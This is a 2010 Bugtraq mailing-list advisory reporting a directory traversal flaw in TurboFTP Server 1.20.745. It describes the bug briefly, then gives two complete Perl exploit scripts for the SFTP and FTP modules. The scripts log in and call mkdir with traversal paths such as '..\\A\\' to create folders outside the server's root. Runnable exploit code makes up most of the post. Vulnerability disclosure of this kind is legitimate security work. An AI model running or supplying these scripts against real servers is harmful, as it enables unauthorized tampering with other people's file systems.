[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
TurboFTP Server Directory Traversal Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: TurboFTP Server Directory Traversal Vulnerability
- From: leinakesi@xxxxxxxxx
- Date: Thu, 17 Jun 2010 01:30:41 -0600
Date of Discovery:
17-Jun-2010
Credits:
leinakesi[at]gmail.com
Vendor:
Turbo FTP Server
Affected:
Turbo FTP Server 1.20.745.
Earlier versions may also be affected.
Overview:
1.vendor description of software
------------------------------------------------
TurboFTP Server is a high performance, secure, scalable and management friendly
file transfer server running on Windows platforms. With it you can easily set
up a secure file transfer server that delivers regular FTP, FTP over SSL/TLS,
and "SFTP over SSH" services with virtual domains, advanced directory access
control, virtual folders, IP access control, flexible authentication options
and many other features.
2.vulnerability details:
------------------------------------------------
Directory Traversal Vulnerability exists in "FTP" and "SFTP" module of Turbo
FTP Server that allows an authenticated user to create directories outside the
root directory, which may lead to other attacks.
If you could log on the server successfully,
take the following steps to create folders outside the sftp root directory:
1. $ssh2 = Net::SSH2->new();
2. $ssh2->connect($server, $port);
3. $ssh2->auth_password($user, $pass);
4. $sftp = $ssh2->sftp();
5. $m = $sftp->mkdir("..\\A\\");
6. $ssh2->disconnect();
take the following steps to create folders outside the ftp root directory:
1. $ftp = Net::FTP->new($server, Debug => 0);
2. $ftp->login($user, $pass);
3. $ftp->mkdir("..\\AA");
4. $ftp->quit;
Severity:
Medium
--------------------------------------------------------------------
Exploit example_1=======>sftp module:
#!/usr/bin/perl
#leinakesi[at]gmail.com
#turboFTP Server(sftp module) directory traversal vulnerability
use Net::SSH2;
use Getopt::Std;
@FUZZ = ("..\\A\\", "..\\AA");
getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass =
$opts{'p'};
if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p
[password]\nexample:\n";
print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
exit(0);
}
$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please
check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are
correct?\n";
$sftp = $ssh2->sftp();
foreach(@FUZZ)
{
if($m = $sftp->mkdir($_))
{
print "mkdir success, $_\n";
}
}
$ssh2->disconnect();
exit(0);
--------------------------------------------------------------------
Exploit example_2=======>ftp module:
#!/usr/bin/perl
#leinakesi[at]gmail.com
#turboFTP Server(ftp module) directory traversal vulnerability
use Net::FTP;
use Getopt::Std;
getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass =
$opts{'p'};
if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p
[password]\nexample:\n";
print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
exit(0);
}
$ftp = Net::FTP->new($server, Debug => 0) or die "Cannot connect to
some.host.name: $@";
$ftp->login($user, $pass) or die "Cannot login ", $ftp->message;
$ftp->mkdir("..\\AA") or die "Cannot change working directory ", $ftp->message;
$ftp->quit;
exit(0);